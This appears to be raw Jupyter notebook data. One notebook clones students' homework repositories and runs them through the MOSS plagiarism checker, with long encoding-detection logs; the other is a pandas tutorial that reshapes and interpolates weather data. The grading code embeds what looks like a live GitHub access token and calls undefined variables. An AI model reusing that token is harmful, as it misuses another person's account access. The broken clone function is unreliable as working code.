URL: http://moss.stanford.edu/results/374137986/match243-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match245-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match245-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match245-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16900\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16887\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16900\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 23650\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16887\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16887\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 23641\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16888\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16887\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 23650\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21276\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 23641\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5307674353111417\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 23641\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match246-top.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 23642\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21277\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 23641\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5356196010713635\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5809497515568466\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5616665620698462\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match246-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match246-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match247-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match247-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match248-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match247-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match248-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match248-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 18909\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 18909\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16899\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 18896\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 18896\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 18909\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16886\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 18909\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 18896\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16899\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 18896\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 18896\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16886\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 18896\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 18897\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16886\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40778\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 18897\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 18896\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16887\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 18896\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16886\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40765\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5467304155562454\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40778\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5450726049544079\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40765\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5308658359951793\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match249-top.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40765\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match249-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match249-1.html\nDEBUG:root:Waiting for all threads to complete\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40766\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40765\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5588585707638614\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25590\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25577\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25590\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25577\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25577\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25578\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25577\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5415272097897004\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\n"
],
[
"import logging",
"_____no_output_____"
],
[
"logging.DEBUG",
"_____no_output_____"
],
[
"logging.WARNING",
"_____no_output_____"
],
[
"# TODO: use absolute paths everywhere...\n\ndef clone_repos(pattern=\"homework-1\", store_at=\"/tmp/homework\"):\n if not os.path.exists(store_at):\n os.mkdir(store_at)\n os.chdir(store_at)\n g = Github(\"5c103d46120d27b0fac5d9d1b9df0b91c77c5d42\")\n org = g.get_organization(\"applied-ml-spring-18\")\n repos = org.get_repos()\n these = [repo for repo in repos_list if pattern in repo.full_name]\n for repo in tqdm.tqdm(these):\n #print(repo.ssh_url)\n if not os.path.exists(repo.name):\n os.system(\"git clone {}\".format(repo.ssh_url))\n for repo in hw4:\n try:\n l = listdir(repo.name)\n except FileNotFoundError:\n #print(repo.name)\n continue\n if len(l) < 2:\n # has .git folder\n shutil.rmtree(repo.name)\n return repos\n\ndef convert_notebooks():\n notebooks = glob(\"*/*.ipynb\")\n for notebook in tqdm.tqdm(notebooks):\n #print(notebook)\n if not os.path.exists(notebook.replace(\"ipynb\", \"py\")):\n os.system(\"jupyter-nbconvert {} --to script\".format(shlex.quote(notebook)))\n \ndef submit_moss():\n import mosspy\n\n userid = 321\n\n m = mosspy.Moss(userid, \"python\")\n m.setDirectoryMode(1)\n\n m.addFilesByWildcard(\"*/*.py\")\n m.addFilesByWildcard(\"*/*/*.py\")\n\n\n url = m.send() # Submission Report URL\n\n print (\"Report Url: \" + url)\n return m, url",
"_____no_output_____"
],
[
"clone_repos(pattern=\"homework-3\", store_at=\"/home/andy/Dropbox/columbia_safe/applied_machine_learning_spring_2018/submissions_hw3/\")",
"100%|██████████| 78/78 [00:00<00:00, 72267.66it/s]\n"
],
[
"convert_notebooks()",
"100%|██████████| 124/124 [03:47<00:00, 1.83s/it]\n"
],
[
"m = submit_moss()",
"Report Url: http://moss.stanford.edu/results/30189410\n"
],
[
"mosspy.download_report(url, \"hw3_report/\", connections=8, log_level=20)",
"_____no_output_____"
],
[
"clone_repos(pattern=\"homework-2\", store_at=\"/home/andy/Dropbox/columbia_safe/applied_machine_learning_spring_2018/submissions_hw2/\")",
"100%|██████████| 135/135 [01:44<00:00, 1.30it/s]\n"
],
[
"convert_notebooks()",
"100%|██████████| 251/251 [06:09<00:00, 1.47s/it]\n"
],
[
"m, url = submit_moss()",
"Report Url: http://moss.stanford.edu/results/136599236\n"
],
[
"#mosspy.download_report(url, \"hw2_report/\", connections=8, log_level=20)",
"_____no_output_____"
],
[
"#mosspy.download_report(\"http://moss.stanford.edu/results/136599236\", \"hw2_report/\", connections=8, log_level=20)",
"_____no_output_____"
],
[
"clone_repos(pattern=\"homework-1\", store_at=\"/home/andy/Dropbox/columbia_safe/applied_machine_learning_spring_2018/submissions_hw1/\")",
"100%|██████████| 146/146 [01:36<00:00, 1.52it/s]\n"
],
[
"convert_notebooks()",
"100%|██████████| 2/2 [00:03<00:00, 1.62s/it]\n"
],
[
"m, url = submit_moss()",
"Report Url: http://moss.stanford.edu/results/558681454\n"
],
[
"mosspy.download_report(url, \"hw1_report/\", connections=8, log_level=20)",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb01b8b3a852589c053a2a47be153f97163ce5d4 | 107,398 | ipynb | Jupyter Notebook | notebook/python/tidy-data-with-pandas.ipynb | praveenhm/machine-learning-tutorials | 0343004b3740f87d3636948428e8e28e6cf43ce0 | [
"MIT"
] | null | null | null | notebook/python/tidy-data-with-pandas.ipynb | praveenhm/machine-learning-tutorials | 0343004b3740f87d3636948428e8e28e6cf43ce0 | [
"MIT"
] | null | null | null | notebook/python/tidy-data-with-pandas.ipynb | praveenhm/machine-learning-tutorials | 0343004b3740f87d3636948428e8e28e6cf43ce0 | [
"MIT"
] | null | null | null | 33.157765 | 289 | 0.374905 | [
[
[
"%run ../common-imports.ipynb",
"_____no_output_____"
]
],
[
[
"\n# Tidy Data with Pandas",
"_____no_output_____"
]
],
[
[
"\n# Reading the csv files into a pandas data frame\n\ntemperature = pd.read_csv(\"../../datasets/temperature.csv\")\nhumidity = pd.read_csv(\"../../datasets/humidity.csv\")\nwind_speed = pd.read_csv(\"../../datasets/wind_speed.csv\")\n\ntemperature.head()",
"_____no_output_____"
],
[
"# Importing the libraries\nimport pandas as pd\nimport numpy as np# Displaying the first 5 rows of the data frame\n\ntemperature.describe(include='all').transpose()",
"_____no_output_____"
]
],
[
[
"# Data Manipulation\n\nLet us unpivot, or melt: convert from wide format to long format, as tidy-data thinking recommends.\n\nTidy data essentially says:\n - Each row should be an observation\n - Each column should be a variable. Roughly, each column that is not an identifier or dimension should be a measure.\n - A dataframe should represent a logical unit of observables",
"_____no_output_____"
]
],
[
[
"tidy_temperature = pd.melt(temperature, \n id_vars=\"datetime\", \n var_name=\"city\", value_name=\"temperature\")",
"_____no_output_____"
],
[
"tidy_temperature.describe(include='all')",
"_____no_output_____"
],
[
"tidy_temperature.head()",
"_____no_output_____"
],
[
"tidy_temperature.sample(20)",
"_____no_output_____"
],
[
"tidy_humidity = pd.melt(humidity, \n id_vars=\"datetime\", \n var_name=\"city\", value_name=\"humidity\")",
"_____no_output_____"
],
[
"tidy_windspeed = pd.melt(wind_speed, \n id_vars=\"datetime\", \n var_name=\"city\", value_name=\"wind_speed\")",
"_____no_output_____"
],
[
"raw_weather = tidy_temperature\\\n .join(tidy_humidity.set_index(['datetime', 'city']), on=['datetime', 'city'])\\\n .join(tidy_windspeed.set_index(['datetime', 'city']), on=['datetime', 'city'])\nraw_weather.sample(20)",
"_____no_output_____"
]
],
[
[
"# Let's cleanup the data \nThere are many strategies to deal with NaN data. Here, since it is weather, perhaps a reasonable way would be interpolating the temperature, humidity and wind_speed. In other words, the tempeture today is reasonable between that of yesterday and tomorrow, as a good approximation.\n\n",
"_____no_output_____"
]
],
[
[
"raw_weather.describe()\n",
"_____no_output_____"
],
[
"# The amount of missing values\nraw_weather.isna().sum()",
"_____no_output_____"
],
[
"weather = raw_weather.interpolate()",
"_____no_output_____"
],
[
"weather.isna().sum()",
"_____no_output_____"
]
],
[
[
"This is because we could not interpolate into the first row! Therefore, let us omit it.\n",
"_____no_output_____"
]
],
[
[
"weather = weather.dropna()\nweather.isna().sum()",
"_____no_output_____"
],
[
"# Filter down to only San Francisco weather\nsf_weather = weather[weather['city'] == 'San Francisco']\nsf_weather.sample(10)",
"_____no_output_____"
],
[
"# Project down to only temperature and humidity\ndata = weather[['datetime', 'city','temperature', 'humidity']]\ndata.sample(10)",
"_____no_output_____"
],
[
